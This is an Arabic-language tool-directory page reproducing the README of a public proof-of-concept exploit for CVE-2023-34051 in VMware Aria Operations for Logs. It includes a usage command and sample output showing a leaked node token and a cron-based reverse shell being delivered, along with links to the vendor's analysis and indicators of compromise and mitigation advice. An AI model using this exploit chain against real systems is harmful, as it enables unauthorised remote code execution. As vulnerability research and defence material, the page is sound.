Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34051 — VMware Aria لعمليات السجلات CVE-2023-34051 | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2023-34051
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمر
GitHubhorizon3ai/cve-2023-34051
621148منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34051

VMware Aria لعمليات السجلات CVE-2023-34051

عرض المستودع

CVE-2023-34051

CVE-2023-34051 هو تجاوز للمصادقة يتجاوز التصحيح لـ VMSA-2023-0001. يتضمن VMSA-2023-0001 لـ vRealize Log Insight الثغرات التالية:

  • ثغرة تجول الدليل في VMware vRealize Log Insight (CVE-2022-31706)
  • ثغرة التحكم في الوصول المكسور في VMware vRealize Log Insight (CVE-2022-31704)
  • ثغرة كشف المعلومات في VMware vRealize Log Insight (CVE-2022-31711)

يقوم التكوين الافتراضي لهذه الثغرة بكتابة مهمة cron لإنشاء شل عكسي. تأكد من تغيير ملف payload ليتناسب مع بيئتك.

التحليل الفني

يمكن العثور على تحليل جذري فني للثغرة في مدونتنا: https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive

مؤشرات الاختراق

لتحليل مثيلات Log Insight بحثًا عن مؤشرات الاختراق، راجع مدونة IOC الخاصة بنا: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/

الملخص

يستغل هذا الدليل (POC) تزوير عنوان IP ونقاط نهاية Thrift RPC المختلفة لتحقيق كتابة ملف عشوائية.

الاستخدام

root@kitploit:~
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit 
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

استكشاف الأخطاء وإصلاحها

لكي ينجح هذا الهجوم، يجب أن يكون لدى المهاجم نفس عنوان IP الخاص بالعقدة الرئيسية/العاملة. راجع المدونة أعلاه لمزيد من التفاصيل.

في حالة استخدام حمولة تعتمد على cron، تأكد من أن ملف الحمولة لديه الأذونات والمالك المناسبين:

root@kitploit:~
sudo chown root:root payload
root@kitploit:~
sudo chmod 0644 payload 

التخفيفات

قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في VMSA https://www.vmware.com/security/advisories/VMSA-2023-0021.html

تابع فريق الهجوم Horizon3.ai على تويتر لأحدث الأبحاث الأمنية:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. يُرجى الاستخدام بمسؤولية.

تنزيل الأداة